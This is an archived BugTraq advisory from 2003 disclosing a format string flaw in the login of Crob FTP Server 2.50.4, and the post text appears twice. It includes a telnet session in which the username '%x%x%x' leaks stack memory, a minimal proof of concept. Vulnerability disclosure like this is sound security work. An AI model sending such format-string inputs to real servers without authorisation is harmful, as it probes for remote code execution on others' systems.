BugTraq
Back to list
|
Post reply
Format String Vulnerability in Crob Ftp Server
Jun 02 2003 04:55PM
Luca Ercoli (luca ercoli inwind it)
Package: Crob Ftp Server
Auth: Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 2.50.4 Build 228
Vulnerability: Format String
Risk: High
Vulnerability
Description:
A format string flaw in the authentication process allows remote attackers
without valid user/pass to execute arbitrary code.
C:\>telnet 192.168.0.1 21
220- Crob FTP Server V2.50.4
220 Welcome to Crob FTP Server
user %x%x%x
331 Password required for 0d1250b70
Luca Ercoli luca.ercoli[at]inwind.it
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Package: Crob Ftp Server
Auth: Crob Software Studio (www.crob.net/studio/ftpserver/)
Version: 2.50.4 Build 228
Vulnerability: Format String
Risk: High
Vulnerability
Description:
A format string flaw in the authentication process allows remote attackers
without valid user/pass to execute arbitrary code.
C:\>telnet 192.168.0.1 21
220- Crob FTP Server V2.50.4
220 Welcome to Crob FTP Server
user %x%x%x
331 Password required for 0d1250b70
Luca Ercoli luca.ercoli[at]inwind.it
[ reply ]